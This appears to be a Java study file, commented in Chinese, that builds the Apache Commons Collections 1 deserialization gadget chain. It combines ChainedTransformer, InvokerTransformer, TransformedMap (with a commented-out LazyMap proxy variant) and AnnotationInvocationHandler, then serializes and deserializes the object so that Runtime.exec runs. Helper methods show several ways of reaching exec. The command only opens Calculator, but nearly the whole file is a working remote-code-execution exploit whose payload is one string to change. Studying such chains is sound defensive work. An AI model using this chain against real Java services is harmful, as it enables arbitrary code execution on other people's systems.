package com.chaitin.cc1;

import com.chaitin.Serialization;
import com.chaitin.Unserialization;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.IOException;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class CC1Test {
    public static void main(String[] args) throws
            NoSuchMethodException,
            InvocationTargetException,
            IllegalAccessException, ClassNotFoundException, IOException, InstantiationException {


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"open -a /System/Applications/Calculator.app"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
//        ------------------------------------TransformedMap-------------------------------------
        // 一个键值对就是一个Entry
        hashMap.put("value","v");
        Map<Object,Object> transformedMap = TransformedMap.decorate(
                hashMap,
                null,
                chainedTransformer);


        // 先获取类
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        // 再取构造器
        Constructor annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        // 确保可访问
        annotationInvocationHandlerConstructor.setAccessible(true);
        // 为了走进readObject的第一个if判断：必须将注解调用控制器构造器的构造方法参数设置为含有成员变量的类
        Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);

//        ------------------------------------LazyMap------------------------------------
        /**
         * LazyMap get() 方法调用了transform函数
         * AnnotationHandler的invoke方法调用了get函数
         * 所以构造动态代理，用AnnotationInvokerHandler作为调用处理器，用来触发invoke方法
         * 往调用处理器里传入一个map，方法名不能是equal而且方法为无参方法
         */
//        Map<Object,Object> lazyMap = LazyMap.decorate(hashMap, chainedTransformer);
//        // 先获取类
//        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
//        // 再取构造器
//        Constructor annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
//        // 确保可访问
//        annotationInvocationHandlerConstructor.setAccessible(true);
//        // 为了触发AnnotationInvocationHandler的invoke方法，要构造一个动态代理
//        InvocationHandler ih = (InvocationHandler) annotationInvocationHandlerConstructor.newInstance(Target.class, lazyMap);
//        // 为了调用处理器走到get方法，要构造map形式的动态代理
//        Map lazyMapDynamicProxy = (Map) Proxy.newProxyInstance(
//                LazyMap.class.getClassLoader(),
//                new Class[]{Map.class},
//                ih);
//        Object o = annotationInvocationHandlerConstructor.newInstance(Target.class, lazyMapDynamicProxy);


//        ----------------------------------------序列化和反序列化----------------------------------------
        Serialization.serialize(o);
        Unserialization.unserialize("ser.bin");

    }

    // 正常弹计算器
    public static void universalCodeExcution() throws IOException {
        Runtime.getRuntime().exec("open -a /System/Applications/Calculator.app");
    }

    // 反射弹计算器
    public static void reflectionCodeExcution() throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {
        Runtime r = Runtime.getRuntime();
        Class c = Runtime.class;
        Method runtimeMethod = c.getMethod("exec", String.class);
        runtimeMethod.invoke(r, "open -a /System/Applications/Calculator.app");
    }

    // InvokerTransformer弹计算器
    public static void invokerTransFormerCodeExcution(){
        Runtime r = Runtime.getRuntime();
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a /System/Applications/Calculator.app"})
                .transform(r);
    }

    // TransformedMap弹计算器
    public static void transformedMapCodeExcution(){
        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a /System/Applications/Calculator.app"});
        HashMap<Object, Object> hashMap = new HashMap<>();
        // 一个键值对就是一个Entry
        hashMap.put("k","v");
        Map<Object,Object> transformedMap = TransformedMap.decorate(hashMap, null, invokerTransformer);
        // 如下为遍历map的写法之一，由于TransformedMap里面没有setValue，会找到他的父类也就是抽象类AbstractInputCheckedMapDecorator的setValue
        for (Map.Entry entry: transformedMap.entrySet()){
             entry.setValue(r);
        }
    }

/**
 * 因为Runtime是不可序列化的，要进行RCE必须使用反射构造出Runtime.exec
 */
    public static Runtime getRunTime() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        // Class是可序列化的
        Class c = Runtime.class;

        // Method getRuntime = c.getMethod("getRuntime",null);
        // 第一个参数类型是string，第二个是class数组, 参数值为getRuntime和null
        // 意思是对runtime类通过反射调用getMethod方法,通过Class类的getMethod方法获取Runtime类的getRuntime方法
        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null})
                .transform(c);
        // Runtime r = (Runtime) getRuntimeMethod.invoke(null, null);
        // 获取Runtime，一样做套娃
        // 通过Method类的invoke方法调用getRuntime方法
        Runtime r = (Runtime) new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null})
                .transform(getRuntimeMethod);
//        InvokerTransformer execInvokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a /System/Applications/Calculator.app"});
//        execInvokerTransformer.transform(r);
        return r;
    }

    //InvokerTransformer弹计算器-纯反射实现
    public static void invokerTransFormerRefectCodeExcution() throws InvocationTargetException, NoSuchMethodException, IllegalAccessException {
        Runtime r = getRunTime();
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a /System/Applications/Calculator.app"})
                .transform(r);
    }

    // ChainedTransformer弹计算器
    public static void chainedTransformerCodeExcution() {
        Transformer[] transformers = new Transformer[]{
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"open -a /System/Applications/Calculator.app"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(Runtime.class);
    }
}
